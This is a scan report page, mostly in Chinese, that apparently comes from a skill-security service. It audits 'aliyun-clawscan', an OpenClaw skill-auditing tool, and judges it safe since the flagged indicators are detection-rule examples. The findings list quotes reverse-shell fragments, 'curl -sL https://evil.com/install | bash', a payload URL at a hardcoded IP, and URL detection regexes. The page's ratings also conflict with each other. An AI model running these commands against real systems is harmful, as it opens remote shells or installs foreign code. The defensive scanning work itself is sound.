Name: aliyun-clawscan Security Report — Trusted | ClawSafe
Item: aliyun-clawscan
Rating: 95
Author: ClawSafe

This report was generated in Chinese. Some content may be in Chinese.

5 /100

aliyun-clawscan

OpenClaw 安全评估工具 - 对已安装/待安装 Skill 进行安全审计与风险检测

aliyun-clawscan 是阿里云提供的 OpenClaw 安全审计工具，预扫描标记的高危 IOC 均来自 reference/skillaudit.md 参考文档中的检测规则示例，而非实际执行的恶意代码。该技能行为与声明一致，定位为安全检测辅助工具。

Skill Namealiyun-clawscan

Duration34.4s

Enginepi

ClawHub Aliyun ClawScan v1.0.2 by aliyun-ai-sec

📥 325 ⭐ 3

ClawHub Verdict Suspicious prompt_injection_instructions

✓

Safe to install

可安全安装使用。此技能仅执行静态分析，不会动态执行可疑代码。

Resource	Declared	Inferred	Status	Evidence
Filesystem	`READ`	`READ`	✓ Aligned	SKILL.md: Safety Guardrails - Read code via file tools
Network	`NONE`	`NONE`	—	SKILL.md: Safety Guardrails - Static analysis only, never execute
Shell	`NONE`	`NONE`	—	SKILL.md: Safety Guardrails - No dynamic testing
Environment	`NONE`	`NONE`	—	SKILL.md: Never enumerate actual user files
Skill Invoke	`NONE`	`NONE`	—	SKILL.md: 仅分析 SKILL.md 和代码，无 skill_invoke

7 Critical 2 High 18 findings

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

reference/skillaudit.md:32

💀

Critical Dangerous Command 危险 Shell 命令

bash -i >&

reference/skillaudit.md:43

💀

Critical Dangerous Command 危险 Shell 命令

nc -e

reference/skillaudit.md:46

💀

Critical Dangerous Command 危险 Shell 命令

python -c 'import socket

reference/skillaudit.md:49

🔒

Critical Encoded Execution Base64 编码执行（代码混淆）

eval(atob(

reference/skillaudit.md:265

💀

Critical Dangerous Command 危险 Shell 命令

curl | bash

reference/skillaudit.md:392

💀

Critical Dangerous Command 危险 Shell 命令

curl -sL https://evil.com/install | bash

reference/skillaudit.md:527

📡

High IP Address 硬编码 IP 地址

1.2.3.4

reference/skillaudit.md:46

📡

High IP Address 硬编码 IP 地址

91.92.242.30

reference/skillaudit.md:393

🔗

Medium External URL 外部 URL

http://\d+\.\d+\.\d+\.\d+/

reference/skillaudit.md:421

🔗

Medium External URL 外部 URL

http://91\.92\.242\.30/

reference/skillaudit.md:422

🔗

Medium External URL 外部 URL

http://.*\.onion/

reference/skillaudit.md:423

🔗

Medium External URL 外部 URL

https://.*\.xyz/download

reference/skillaudit.md:424

🔗

Medium External URL 外部 URL

https://.*\.top/install

reference/skillaudit.md:425

🔗

Medium External URL 外部 URL

http://91.92.242.30/q0c7ew2ro8l2cfqp

reference/skillaudit.md:453

🔗

Medium External URL 外部 URL

http://\d+\.\d+\.\d+\.\d+

reference/skillaudit.md:483

🔗

Medium External URL 外部 URL

https://evil.com/install

reference/skillaudit.md:527

🔗

Medium External URL 外部 URL

http://1.2.3.4/payload

reference/skillaudit.md:529

File Tree

4 files · 23.0 KB · 873 lines

Markdown 3f · 853L Text 1f · 20L

├─ ▾ 📁 reference

│ ├─ 📝 baseline.md Markdown 107L · 2.5 KB

│ └─ 📝 skillaudit.md Markdown 571L · 13.5 KB

├─ 📄 LICENSE.txt Text 20L · 1.1 KB

└─ 📝 SKILL.md Markdown 175L · 6.0 KB

Security Positives

✓ 声称功能与实际行为完全一致（静态分析）

✓ 明确的安全护栏：不执行代码、不绕过沙箱、不枚举用户文件

✓ 完整的检测规则文档，包含 11 类威胁场景

✓ 提供证据-based 报告（file:line 引用）

✓ 输出模板标准化，便于用户理解风险等级

Scan Report

File Tree

Security Positives